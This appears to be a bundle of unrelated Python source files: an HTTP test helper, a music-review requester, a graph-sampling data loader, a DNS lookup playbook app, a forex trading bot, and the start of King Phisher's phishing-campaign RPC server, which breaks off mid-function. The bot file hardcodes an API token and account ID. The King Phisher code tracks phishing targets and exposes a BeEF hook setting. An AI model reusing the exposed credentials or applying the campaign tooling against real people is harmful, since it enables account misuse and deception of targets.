else '{}-{}'.format(minLen, maxLen)))
# offset between got and expected index may result from variable length
# result data, e.g. microseconds of time stamps
iGot = iExp = 0
while iExp < lenExp:
if iGot >= lenGot:
iGot = lenGot + 1
break
if got[iGot] == expected[iExp]:
iExp += 1
iGot += 1
continue
# bytes do not match, check ignore Range
ignoreRange = None
for r in ignoreRanges:
if iExp >= r[0] and iExp < r[1]:
ignoreRange = r
break
if ignoreRange:
rStart = ignoreRange[0]
rEnd = ignoreRange[1]
rLeft = rEnd - iExp
rFewer = ignoreRange[2] if len(ignoreRange) > 2 else 0
rMore = ignoreRange[3] if len(ignoreRange) > 3 else 0
varLen = rFewer + rMore
# advance expected pointer behind range
iExp = rEnd
exp = expected[iExp] if iExp < lenExp else None
# static range length: advance got pointer behind range
if varLen == 0:
iGot += rLeft
continue
# dynamic ignore range length: search end of range indicated
# by current exp pointer but limited by rLenDiff
iGot += min(rLeft, rLeft - rFewer)
# expected data ends on ignore range
if exp == None:
iGot += min(lenGot-iGot, varLen)
continue
# search range end in data
else:
pos = got[iGot:iGot+varLen+1].find(exp)
if pos >= 0:
iGot += pos
continue
return (iGot, '... [ {} ] != [ {} ] ...'.format(
got[max(0, iGot-10):min(lenGot, iGot+11)],
expected[max(0, iExp-10):min(lenExp, iExp+11)]))
if iGot < lenGot:
return (lenGot, 'read {} more bytes than expected'.format(
lenGot-iGot))
elif iGot > lenGot:
return (lenGot, 'read {} fewer bytes than expected'.format(
iGot-lenGot))
# should not happen
return (None, None)
#--------------------------------------------------------------------------
def testGET(self, url, contentType='text/html', ignoreRanges=[],
concurrent=False, retCode=200, testID=None, auth=None,
data=None, dataFile=None, diffContent=True, silent=False):
if concurrent:
self.testGETConcurrent(url, contentType, data, dataFile, retCode,
testID, ignoreRanges, auth, diffContent)
else:
self.testGETOneShot(url, contentType, data, dataFile, retCode,
testID, ignoreRanges, auth, diffContent,
silent)
#--------------------------------------------------------------------------
def testGETOneShot(self, url, contentType='text/html', data=None,
dataFile=None, retCode=200, testID=None, ignoreRanges=[],
auth=None, diffContent=True, silent=False):
if not silent:
if testID is not None:
print('#{} '.format(testID), end='')
print('{}: '.format(url), end='')
stream = False if dataFile is None else True
r = requests.get(url, stream=stream, auth=auth)
if r.status_code != retCode:
raise ValueError('Invalid status code, expected "{}", got "{}"' \
.format(retCode, r.status_code))
if contentType != r.headers['content-type']:
raise ValueError('Invalid content type, expected "{}", got "{}"' \
.format(contentType, r.headers['content-type']))
expected = None
if data is not None:
expected = py3bstr(data)
elif dataFile is not None:
with open(dataFile, 'rb') as f:
expected = f.read()
if expected is not None:
if diffContent:
errPos, errMsg = self.diff(expected, r.content, ignoreRanges)
if errPos is not None:
raise ValueError('Unexpected content at byte {}: {}'.format(
errPos, errMsg))
else:
if len(expected) != len(r.content):
raise ValueError('Unexpected content length, expected {}, '
'got {}'.format(len(expected),
len(r.content)))
if not silent:
print('OK')
sys.stdout.flush()
#--------------------------------------------------------------------------
def testGETConcurrent(self, url, contentType='text/html', data=None,
dataFile=None, retCode=200, testID=None,
ignoreRanges=[], auth=None, diffContent=True,
repetitions=1000, numThreads=10):
if testID is not None:
print('#{} '.format(testID), end='')
print('concurrent [{}/{}] {}: '.format(repetitions, numThreads, url),
end='')
sys.stdout.flush()
def doWork():
while True:
try:
i = q.get()
if i is None:
break
self.testGETOneShot(url, contentType, data, dataFile,
retCode, testID, ignoreRanges, auth,
diffContent, True)
print('.', end='')
sys.stdout.flush()
except ValueError as e:
errors.append("error in job #{}: {}".format(i, str(e)))
finally:
q.task_done()
# queue
q = Queue()
errors = []
# start worker threads
threads = []
for i in range(numThreads):
t = Thread(target=doWork)
t.start()
threads.append(t)
# populate queue with work
for i in range(repetitions):
q.put(i)
q.join()
# stop worker
for i in range(numThreads):
q.put(None)
for t in threads:
t.join()
if errors:
raise ValueError("{} errors occured, first one is: {}".format(
len(errors), errors[0]))
print(' OK')
sys.stdout.flush()
# vim: ts=4 et tw=79
|
reviews.py
|
"""
Fall 2017 CSc 690
File: flickr_thread.py
Author: Steve Pedersen & Andrew Lesondak
System: OS X
Date: 12/13/2017
Usage: python3 spotify_infosuite.py
Dependencies: pyqt5, thread, pitchfork, metacritic
Description: Requester class. A thread used to search Metacritic and Pitchfork asynchronously.
"""
from reviews.pitchfork import pitchfork
from reviews.metacritic import metacritic
import threading
import json
import os
from threading import Thread
from PyQt5.QtCore import *
class Requester(QThread):
pitchfork_receiver = pyqtSignal(str)
metacritic_receiver = pyqtSignal(object)
"""
This class makes threaded requests for reviews from various sources.
It emits pyqtSignals with response objects or strings.
"""
def __init__(self):
super().__init__()
def get_metacritic_review(self, artist, album):
"""
Spawns a thread to search for a review for an album, then emits a pyqtsignal
with the review object from metacritic.Review
"""
def __get_data(arg1, arg2):
artist, album = arg1, arg2
album = self.get_formatted_album_string(album, 'metacritic')
# with open('./reviews/credentials.json') as creds:
with open(os.path.dirname(__file__) + '/credentials.json') as creds:
credentials = json.load(creds)
apikey = credentials['metacritic']['apikey']
print('Searching Metacritic for album: ', album)
m = metacritic.search(artist, album, apikey)
# if m.has_review:
self.metacritic_receiver.emit(m)
worker = threading.Thread(target=__get_data, args=[artist,album])
worker.setDaemon(True)
worker.start()
def get_pitchfork_review(self, artist, album):
"""
Spawns a thread to search for a review for an album, then emits a pyqtsignal
with the formatted review string.
"""
def __get_data(arg1, arg2):
artist, album = arg1, arg2
album = self.get_formatted_album_string(album)
print('Searching Pitchfork for artist/album: ', artist,' - ',album)
p = pitchfork.search(artist, album)
if p.has_review:
review = 'Pitchfork - Rating: '+str(p.score())+' - '+p.album() \
+' ('+str(p.year())+')'+'\n\n'+p.editorial() #[:800]
else:
review = p.message
self.pitchfork_receiver.emit(review)
worker = threading.Thread(target=__get_data, args=[artist,album])
worker.setDaemon(True)
worker.start()
def get_formatted_album_string(self, album, source=''):
"""
This is bad... meant only to be a temporary workaround to get some of my
favorite albums to work with InfoSuite.
"""
album = album.replace('(Deluxe Version)','').rstrip() \
.replace('(Remastered)','') \
.replace('Remastered','') \
.replace('[Remastered]','') \
.replace('(Deluxe Edition)','') \
.replace('(Remastered Deluxe Edition)','') \
.replace('(Non UK Version)','') \
.replace('(US Internet Release)','') \
.replace('(Special Edition)','') \
.replace('(Remastered)','') \
.replace('(Legacy Edition)','') \
.replace('(Deluxe Edition [Remastered])','') \
.replace('(U.S. Version)','') \
.replace('(1998 Remastered Version)','') \
.replace('(2011 Remastered Version)','') \
.replace('(2011 Remaster)','') \
.replace('(Deluxe)','') \
.replace('Deluxe Edition','') \
.replace('(Expanded Edition)','') \
.replace('(Remastered Original Album)','') \
.replace("(20th Anniversary Collector's Edition)",'')
if source == 'metacritic':
album = album.replace(' ', '-')
return album
|
dataloader.py
|
import os
import sys
# set environment
#module_name ='PaGraph'
#modpath = os.path.abspath('.')
#if module_name in modpath:
# idx = modpath.find(module_name)
# modpath = modpath[:idx]
#sys.path.append(modpath)
import dgl
import torch
import numpy as np
import multiprocessing as mp
import socket
barrier_interval = 20
sample_port = 8760
class SampleLoader:
""" SampleLoader
sample load pipeline
"""
def __init__(self, graph, rank, one2all=False):
# connect to server sampler:
barrier_rank = 0 if one2all else rank
self._barrier = SampleBarrier('trainer', rank=barrier_rank)
self._graph = graph
self._rank = rank
self._port = sample_port
# wait for recving samples
self._recver = dgl.contrib.sampling.SamplerReceiver(
self._graph,
'127.0.0.1:' + str(self._port + rank),
1, # sender num
net_type='socket'
)
self._batch_num = 0
self._barrier_interval = barrier_interval
self._sampler_iter = None
def __iter__(self):
self._batch_num = 0
self._recver_iter = iter(self._recver)
return self
def __next__(self):
try:
nf = next(self._recver_iter)
except StopIteration:
# end of an epoch
self._barrier.barrier()
self._batch_num = 0
raise StopIteration
self._batch_num += 1
#if self._batch_num % self._barrier_interval == 0:
if self._batch_num % self._barrier_interval == 0:
self._barrier.barrier()
return nf
def __del__(self):
del self._recver
class SampleDeliver:
""" Sample Deliver
deliver sample through network
"""
def __init__(self, graph,
train_nid,
neighbor_num,
hops,
trainer_num,
sampler=None):
self._graph = graph
self._train_nid = train_nid
self._neighbor_num = neighbor_num
self._hops = hops
self._trainer_num = trainer_num
self._sender_port = sample_port
self._proc = None
self._one2all = False
self._barrier_interval = barrier_interval
self._sampler = sampler
def async_sample(self, epoch, batch_size, one2all=False):
self._one2all = one2all
if one2all:
self._proc = mp.Process(target=self.one2all_sample, args=(epoch, batch_size))
self._proc.start()
else:
if not isinstance(self._train_nid, list):
chunk_size = int(self._train_nid.shape[0] / self._trainer_num) - 1
#self._proc = mp.Pool()
self._proc = []
for rank in range(self._trainer_num):
print('starting child sampler process {}'.format(rank))
if isinstance(self._train_nid, list):
sampler_nid = self._train_nid[rank]
else:
sampler_nid = self._train_nid[chunk_size * rank:chunk_size * (rank + 1)]
#self._proc.apply_async(self.one2one_sample,
# args=(epoch, batch_size, sampler_nid, rank))
proc = mp.Process(target=self.one2one_sample,
args=(epoch, batch_size, sampler_nid, rank))
proc.start()
self._proc.append(proc)
def one2all_sample(self, epoch_num, batch_size):
"""
one sampler to all trainers with global shuffle
"""
# to be fixed: the sampler can't be loaded here unless set shuffle=False
if self._sampler is None:
sampler = dgl.contrib.sampling.NeighborSampler(
self._graph, batch_size,
self._neighbor_num, neighbor_type='in',
shuffle=False,
num_workers=self._trainer_num * 2,
num_hops=self._hops,
seed_nodes=self._train_nid,
prefetch=True)
else: # temporary solution: load shuffled sampler outside (?)
sampler = self._sampler
# waiting trainers connecting
barrier = SampleBarrier('server', trainer_num=self._trainer_num)
namebook = {tid: '127.0.0.1:' + str(self._sender_port + tid)\
for tid in range(self._trainer_num)}
sender = dgl.contrib.sampling.SamplerSender(namebook, net_type='socket')
for epoch in range(epoch_num):
tid = 0
idx = 0
for nf in sampler:
# non-blocking send
sender.send(nf, tid % self._trainer_num)
tid += 1
if tid % self._trainer_num == 0:
idx += 1
#print('sent batch ', idx)
if idx % self._barrier_interval == 0:
barrier.barrier()
# temporary solution: makeup the unbalanced pieces
#print('Epoch {} end. Next tid: {}'.format(epoch+1, tid % self._trainer_num))
while tid % self._trainer_num != 0:
sender.send(nf, tid % self._trainer_num)
#print('Epoch {}: Makeup Sending tid: {}'.format(epoch+1, tid % self._trainer_num))
tid += 1
# end of epoch
for tid in range(self._trainer_num):
sender.signal(tid)
barrier.barrier()
def one2one_sample(self, epoch_num, batch_size, train_nid, rank):
"""
one sampler to one trainer with local shuffle
"""
# to be fixed: the sampler can't be loaded here unless set shuffle=False
graph = self._graph[rank] if isinstance(self._graph, list) else self._graph
if self._sampler is None:
sampler = dgl.contrib.sampling.NeighborSampler(graph, batch_size,
self._neighbor_num, neighbor_type='in',
shuffle=False, num_workers=4,
num_hops=self._hops, seed_nodes=train_nid,
prefetch=True)
else: # temporary solution: load shuffled sampler outside (?)
sampler = self._sampler[rank]
# waiting trainers connecting
barrier = SampleBarrier('server', rank=rank)
namebook = {0: '127.0.0.1:'+ str(self._sender_port + rank)}
sender = dgl.contrib.sampling.SamplerSender(namebook, net_type='socket')
for epoch in range(epoch_num):
idx = 0
for nf in sampler:
sender.send(nf, 0)
idx += 1
if idx % self._barrier_interval == 0:
barrier.barrier()
sender.signal(0)
# barrier
barrier.barrier()
def __del__(self):
if not self._proc is None:
if self._one2all:
self._proc.join()
else:
for proc in self._proc:
proc.join()
class SampleBarrier:
def __init__(self, role, trainer_num=1, rank=0):
"""
Params:
role :
'server' or 'trainer'
trainer_num:
for role == 'server'
rank :
for one2one sampling
"""
self._ip = '127.0.0.1'
self._port = 8200 + rank
self._role = role
if self._role == 'server':
print('start listening at: ' + self._ip + ' : ' + str(self._port))
self._server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._server_sock.bind((self._ip, self._port))
self._server_sock.listen(8)
self._socks = []
while trainer_num != 0:
clientsocket, addr = self._server_sock.accept()
print('recv a connection. Waiting for connections of {} trainers'.format(trainer_num-1))
clientsocket.setblocking(1)
self._socks.append(clientsocket)
trainer_num -= 1
elif self._role == 'trainer':
print('[{}]: try connecting server at: '.format(rank) + self._ip + ' : ' + str(self._port))
self._socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socks.connect((self._ip, self._port))
self._socks.setblocking(0) # to non-blocking
print('connected to a remote sampler.')
else:
print('Unknown role')
sys.exit(-1)
def barrier(self):
if self._role == 'server':
for sock in self._socks:
_ = sock.recv(128)
else:
self._socks.send('barrier'.encode('utf-8'))
|
app.py
|
"""ThreatConnect Playbook App"""
# standard library
import json
import time
import traceback
from threading import Lock, Thread
from urllib.parse import urlparse
# third-party
import dns.exception
import dns.message
import dns.query
import dns.resolver
# first-party
from argcheck import tc_argcheck
from json_util import conform_objects, refold
from playbook_app import PlaybookApp # Import default Playbook App Class (Required)
from trap_exception import trap
TIMEOUT = 3
class Throttle:
"""Throttle Class"""
def __init__(self, rate=150):
"""Create a throttle for a specific rate/sec"""
self.lock = Lock()
self.rate = rate
self.ts = None
self.count = 0
def __call__(self):
"""Return when the throttle limit is acceptable"""
with self.lock:
now = time.time()
if self.ts is None:
self.ts = now
if now - self.ts >= 1.0:
self.count = 0
self.ts = now
self.count += 1
if self.count <= self.rate:
return
time.sleep(self.ts + 1 - now)
class App(PlaybookApp):
"""Playbook App"""
def __init__(self, _tcex):
"""Initialize class properties."""
super().__init__(_tcex)
self.outputs = []
self.exit_code = 0
self.exit_message = 'Success.'
self.questions = []
self.answers = []
self.throttle = None
self.cache = dns.resolver.LRUCache()
self.nameservers = None
self.transform_ptr = True
def add_output(self, name, value, jsonify=False):
"""Add an output to the output list"""
self.outputs.append((name, value, jsonify))
@trap()
def lookup_dns(self) -> None:
"""Run the App main logic.
This method should contain the core logic of the App.
"""
questions = tc_argcheck(
self.tcex.rargs, 'questions', label='Question(s)', required=True, tcex=self.tcex
)
if not isinstance(questions, list):
questions = [questions]
record_types = tc_argcheck(self.tcex.rargs, 'record_types', required=True, tcex=self.tcex)
if not isinstance(record_types, list):
record_types = [record_types]
record_types = [x for x in record_types if x]
if not record_types:
self.fail('At least one resource record type is required.')
self.tcex.log.debug(f'Questions: {questions!r}, rrtypes {record_types!r}')
for question in questions:
if isinstance(question, dict): # must be tcentity
entity_type = question.get('type')
question = question.get('value')
if entity_type == 'EmailAddress':
if '@' not in question:
self.tcex.log.warning(f'Invalid EmailAddress {question} -- Skipped')
continue
question = question.split('@', 1)[1]
elif entity_type == 'Address':
pass
elif entity_type == 'Host':
pass
elif entity_type.upper() == 'URL':
question = urlparse(question).netloc
else:
self.tcex.log.warning(f'Unexpected indicator type {entity_type} -- Skipped')
continue
for rrtype in record_types:
self.questions.append((question, rrtype))
self.tcex.log.debug(f'Queuing {len(self.questions)} for resolution')
self.batch_resolve()
result = {}
cnames = {}
valid_questions = set()
invalid_questions = set()
for answer in self.answers:
question, cname, answers = answer
qname, rrtype = question
rrdict = result.get(qname, {})
result[qname] = rrdict
alist = rrdict.get(rrtype, [])
rrdict[rrtype] = alist
if answers:
valid_questions.add(qname)
for a in answers:
if a not in alist:
alist.append(a)
if qname not in cnames:
cnames[qname] = cname
for answer in self.answers:
question, cname, answers = answer
qname, rrtype = question
if qname not in valid_questions:
invalid_questions.add(qname)
self.add_output('dns.result.json', result, jsonify=True)
self.add_output('dns.valid', sorted(list(valid_questions)))
self.add_output('dns.invalid', sorted(list(invalid_questions)))
def fail(self, exit_message):
"""Exit with failure message, but after writing output"""
self.exit_code = 1
self.exit_message = exit_message
self.write_output()
@property
def fail_on_no_results(self):
"""Return True if fail_on_no_results is set"""
return tc_argcheck(
self.tcex.args, 'fail_on_no_results', types=bool, default=False, tcex=self.tcex
)
def handle_exception(self, e):
"""Handle exceptions raised during any trap() decorated method"""
exit_message = str(e)
if ' ' not in exit_message:
exit_message = repr(e)
self.tcex.log.error(repr(e))
self.tcex.log.error(traceback.format_exc())
self.fail(exit_message)
def setup(self):
"""Perform prep/startup operations."""
self.nameservers = tc_argcheck(
self.tcex.rargs, 'dns_servers', label='DNS Servers', required=True, tcex=self.tcex
)
rate_limit = tc_argcheck(
self.tcex.rargs, 'rate_limit', required=True, types=int, default=150, tcex=self.tcex
)
self.throttle = Throttle(rate_limit)
self.transform_ptr = tc_argcheck(
self.tcex.rargs, 'transform_ptr', default=True, types=bool, tcex=self.tcex
)
if isinstance(self.nameservers, str):
self.nameservers = self.nameservers.split(',')
if not isinstance(self.nameservers, list):
self.nameservers = [self.nameservers]
self.nameservers = [x.strip() for x in self.nameservers]
self.add_output('dns.action', self.tcex.rargs.tc_action)
def write_one(self, name, value):
"""Write one output"""
if isinstance(value, list):
kind = 'StringArray'
else:
kind = 'String'
if not isinstance(value, (list, dict, int, str, bool, float)) and value is not None:
value = repr(value)
self.tcex.playbook.create_output(name, value, kind)
def write_output(self) -> None:
"""Write the Playbook output variables."""
for prefix, value, jsonify in self.outputs:
if callable(value):
try:
value = value() # deferred action output
except Exception:
self.tcex.log.error(
f'Exception raised during output handling for {prefix}, '
'writing null output'
)
value = None
if jsonify and isinstance(value, (list, dict)):
value = json.dumps(value)
self.tcex.log.debug(f'JSONifying output {prefix}')
if isinstance(value, (list, dict)):
value = conform_objects(value)
value = refold(value, prefix=prefix)
for name, inner_value in value.items():
self.write_one(name, inner_value)
else:
self.write_one(prefix, value)
self.tcex.playbook.exit(self.exit_code, self.exit_message)
def batch_resolve(self, count=4):
"""Fire up count resolver threads, then join on them"""
threads = []
for n in range(count):
threads.append(
Thread(group=None, target=self.resolver_thread, name=f'Resolver-{n+1}', daemon=True)
)
for thread in threads:
self.tcex.log.debug(f'Starting Resolver {thread.name}')
thread.start()
for thread in threads:
self.tcex.log.debug(f'Joining Resolver {thread.name}')
thread.join()
def resolver_thread(self):
"""Resolver Thread to handle DNS lookups"""
self.tcex.log.debug(f'Resolver starting... {len(self.questions)} questions remaining...')
try:
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = self.nameservers
resolver.timeout = TIMEOUT
resolver.cache = self.cache
except Exception as e:
self.tcex.log.error(f'Failed to create resolver: {e}')
self.tcex.log.error(traceback.format_exc())
while self.questions:
question = self.questions.pop()
self.throttle()
self.tcex.log.debug(f'Question: {question}')
answer = self.resolve(question, resolver)
cname = None
if answer:
result = []
for rdata in answer:
data = rdata.to_text()
if data.endswith('.'):
data = data[:-1]
result.append(data)
cname = str(answer.canonical_name)
if cname.endswith('.'): # it will!
cname = cname[:-1]
answer = result
self.tcex.log.debug(f'Answer: {question} ({cname})= {answer}')
self.answers.append((question, cname, answer))
def resolve(self, question, resolver):
"""Resolve ONE question, in the form of (name, rrtype)"""
name, rrtype = question
try:
if rrtype == 'PTR' and self.transform_ptr:
answer = resolver.resolve_address(name, lifetime=3, search=False)
else:
answer = resolver.resolve(name, rrtype, lifetime=3, search=False)
return answer
except dns.exception.Timeout:
self.tcex.log.debug(f'Timeout resolving {name} {rrtype}')
except dns.resolver.NXDOMAIN:
self.tcex.log.debug(f'NXDOMAIN resolving {name} {rrtype}')
except dns.resolver.YXDOMAIN:
self.tcex.log.debug(f'YXDOMAIN resolving {name} {rrtype}')
except dns.resolver.NoAnswer:
self.tcex.log.debug(f'No answer resolving {name} {rrtype}')
except dns.resolver.NoNameservers:
self.tcex.log.debug(f'No nameservers resolving {name} {rrtype}')
except Exception as e:
self.tcex.log.error(f'Error resolving question: {e}')
self.tcex.log.error(traceback.format_exc())
return None
|
bot.py
|
from trade_client import TradeClient
from trading import TradeORB
from log_wrapper import LogWrapper
import threading
#practice account so no security threat
accountID = '101-001-19034598-001'
token = '06e811dacdba86915a05a7031c744136-94a79c4cfede80f7362248aa069e8214'
# creating oanda client object
trade_client = TradeClient(accountID, token)
# EURO USD trading object
trade_EUR_USD = TradeORB(trade_client, "EUR_USD")
# AUS CAD (Australian Dollar-Canadian Dollar) trading object
trade_AUD_CAD = TradeORB(trade_client, "AUD_CAD")
# EUR JPY trading object
trade_EUR_JPY = TradeORB(trade_client, "EUR_JPY")
def start_trading(trading_obj):
# infinite loop over buy sell method
while True:
trading_obj.buy_sell_ORB()
if __name__ == '__main__':
# creating thread for each object type
t1 = threading.Thread(target=start_trading, args=(trade_EUR_USD,))
t2 = threading.Thread(target=start_trading, args=(trade_AUD_CAD,))
t3 = threading.Thread(target=start_trading, args=(trade_EUR_JPY,))
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# starting thread 3
t3.start()
# if threads completely executed
print("Trading BOT Running.....")
|
server_rpc.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/server_rpc.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import datetime
import functools
import logging
import threading
from king_phisher import errors
from king_phisher import geoip
from king_phisher import ipaddress
from king_phisher import version
from king_phisher.constants import ConnectionErrorReason
from king_phisher.server import signals
from king_phisher.server.database import manager as db_manager
from king_phisher.server.database import models as db_models
from king_phisher.server.graphql import schema
import advancedhttpserver
import pyotp
CONFIG_READABLE = (
'beef.hook_url',
'server.addresses',
'server.cookie_name',
'server.require_id',
'server.rest_api.enabled',
'server.secret_id',
'server.tracking_image',
'server.vhost_directories',
'server.web_root'
)
"""Configuration options that can be accessed by the client."""
CONFIG_WRITEABLE = ('beef.hook_url',)
"""Configuration options that can be changed by the client at run time."""
RPC_AUTH_HEADER = 'X-RPC-Auth'
"""The header which contains the RPC authorization / session token."""
VIEW_ROW_COUNT = 50
"""The default number of rows to return when one of the /view methods are called."""
database_tables = db_models.database_tables
graphql_schema = schema.Schema()
rpc_logger = logging.getLogger('KingPhisher.Server.RPC')
def register_rpc(path, database_access=False, log_call=False):
"""
Register an RPC function with the HTTP request handler. This allows the
method to be remotely invoked using King Phisher's standard RPC interface.
If *database_access* is specified, a SQLAlchemy session will be passed as
the second argument, after the standard
:py:class:`~advancedhttpserver.RequestHandler` instance.
:param str path: The path for the RPC function.
:param bool database_access: Whether or not the function requires database access.
:param bool log_call: Whether or not to log the arguments which the function is called with.
"""
path = '^' + path + '$'
def decorator(function):
@functools.wraps(function)
def wrapper(handler_instance, *args, **kwargs):
if log_call and rpc_logger.isEnabledFor(logging.DEBUG):
args_repr = ', '.join(map(repr, args))
if kwargs:
for key, value in sorted(kwargs.items()):
args_repr += ", {0}={1!r}".format(key, value)
msg = "calling RPC method {0}({1})".format(function.__name__, args_repr)
rpc_logger.debug(msg)
signals.send_safe('rpc-method-call', rpc_logger, path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs)
if database_access:
session = db_manager.Session()
try:
result = function(handler_instance, session, *args, **kwargs)
finally:
session.close()
else:
result = function(handler_instance, *args, **kwargs)
signals.send_safe('rpc-method-called', rpc_logger, path[1:-1], request_handler=handler_instance, args=args, kwargs=kwargs, retval=result)
return result
advancedhttpserver.RegisterPath(path, is_rpc=True)(wrapper)
return wrapper
return decorator
@register_rpc('/ping', log_call=True)
def rpc_ping(handler):
"""
An RPC method that can be used by clients to assert the status
and responsiveness of this server.
:return: This method always returns True.
:rtype: bool
"""
return True
@register_rpc('/shutdown', log_call=True)
def rpc_shutdown(handler):
"""
This method can be used to shut down the server. This function will
return, however no subsequent requests will be processed.
.. warning::
This action will stop the server process and there is no
confirmation before it takes place.
"""
shutdown_thread = threading.Thread(target=handler.server.kp_shutdown)
shutdown_thread.start()
rpc_logger.debug("shutdown routine running in tid: 0x{0:x}".format(shutdown_thread.ident))
return
@register_rpc('/version', log_call=True)
def rpc_version(handler):
"""
Get the version information of the server. This returns a
dictionary with keys of version, version_info and rpc_api_version.
These values are provided for the client to determine
compatibility.
:return: A dictionary with version information.
:rtype: dict
"""
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
message = "an rpc request to /version was received from non-loopback IP address: {0}".format(handler.client_address[0])
rpc_logger.error(message)
raise errors.KingPhisherAPIError(message)
vinfo = {
'rpc_api_version': version.rpc_api_version,
'version': version.version,
'version_info': version.version_info._asdict()
}
return vinfo
@register_rpc('/config/get')
def rpc_config_get(handler, option_name):
"""
Retrieve a value from the server's configuration.
:param str option_name: The name of the configuration option.
:return: The option's value.
"""
if isinstance(option_name, (list, tuple)):
option_names = option_name
option_values = {}
for option_name in option_names:
if not option_name in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
option_values[option_name] = handler.config.get(option_name)
return option_values
if not option_name in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
return handler.config.get(option_name)
return
@register_rpc('/config/set')
def rpc_config_set(handler, options):
"""
Set options in the server's configuration. Any changes to the
server's configuration are not written to disk.
:param dict options: A dictionary of option names and values
"""
for option_name, option_value in options.items():
if not option_name in CONFIG_WRITEABLE:
raise errors.KingPhisherPermissionError('permission denied to write config option: ' + option_name)
handler.config.set(option_name, option_value)
return
@register_rpc('/campaign/new', database_access=True, log_call=True)
def rpc_campaign_new(handler, session, name, description=None):
"""
Create a new King Phisher campaign and initialize the database
information.
:param str name: The new campaign's name.
:param str description: The new campaign's description.
:return: The ID of the new campaign.
:rtype: int
"""
if session.query(db_models.Campaign).filter_by(name=name).count():
raise ValueError('the specified campaign name already exists')
campaign = db_models.Campaign(name=name, description=description, user_id=handler.rpc_session.user)
campaign.assert_session_has_permissions('c', handler.rpc_session)
session.add(campaign)
session.commit()
return campaign.id
@register_rpc('/campaign/alerts/is_subscribed', database_access=True, log_call=True)
def rpc_campaign_alerts_is_subscribed(handler, session, campaign_id):
"""
Check if the user is subscribed to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
:return: The alert subscription status.
:rtype: bool
"""
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=handler.rpc_session.user)
return query.count()
@register_rpc('/campaign/alerts/subscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_subscribe(handler, session, campaign_id):
"""
Subscribe to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
user_id = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=user_id)
if query.count() == 0:
subscription = db_models.AlertSubscription(campaign_id=campaign_id, user_id=user_id)
subscription.assert_session_has_permissions('c', handler.rpc_session)
session.add(subscription)
session.commit()
@register_rpc('/campaign/alerts/unsubscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_unsubscribe(handler, session, campaign_id):
"""
Unsubscribe to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
user_id = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=user_id)
subscription = query.first()
if subscription:
subscription.assert_session_has_permissions('d', handler.rpc_session)
session.delete(subscription)
session.commit()
@register_rpc('/campaign/landing_page/new', database_access=True, log_call=True)
def rpc_campaign_landing_page_new(handler, session, campaign_id, hostname, page):
"""
Add a landing page for the specified campaign. Landing pages refer
to resources that when visited by a user should cause the visit
counter to be incremented.
:param int campaign_id: The ID of the campaign.
:param str hostname: The hostname which will be used to serve the request.
:param str page: The request resource.
"""
hostname = hostname.split(':', 1)[0]
page = page.lstrip('/')
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=campaign_id, hostname=hostname, page=page)
if query.count() == 0:
landing_page = db_models.LandingPage(campaign_id=campaign_id, hostname=hostname, page=page)
landing_page.assert_session_has_permissions('c', handler.rpc_session)
session.add(landing_page)
session.commit()
def _message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
department = None
if department_name is not None:
department = session.query(db_models.CompanyDepartment).filter_by(name=department_name).first()
if department is None:
department = db_models.CompanyDepartment(name=department_name)
department.assert_session_has_permissions('c', handler.rpc_session)
session.add(department)
session.commit()
message = db_models.Message()
message.id = email_id
message.campaign_id = campaign_id
message.target_email = target_email
message.first_name = first_name
message.last_name = last_name
if department is not None:
message.company_department_id = department.id
return message
@register_rpc('/campaign/message/new', database_access=True, log_call=True)
def rpc_campaign_message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
"""
Record a message that has been sent as part of a campaign. These details can
be retrieved later for value substitution in template pages.
:param int campaign_id: The ID of the campaign.
:param str email_id: The message id of the sent email.
:param str target_email: The email address that the message was sent to.
:param str first_name: The first name of the message's recipient.
:param str last_name: The last name of the message's recipient.
:param str department_name: The name of the company department that the message's recipient belongs to.
"""
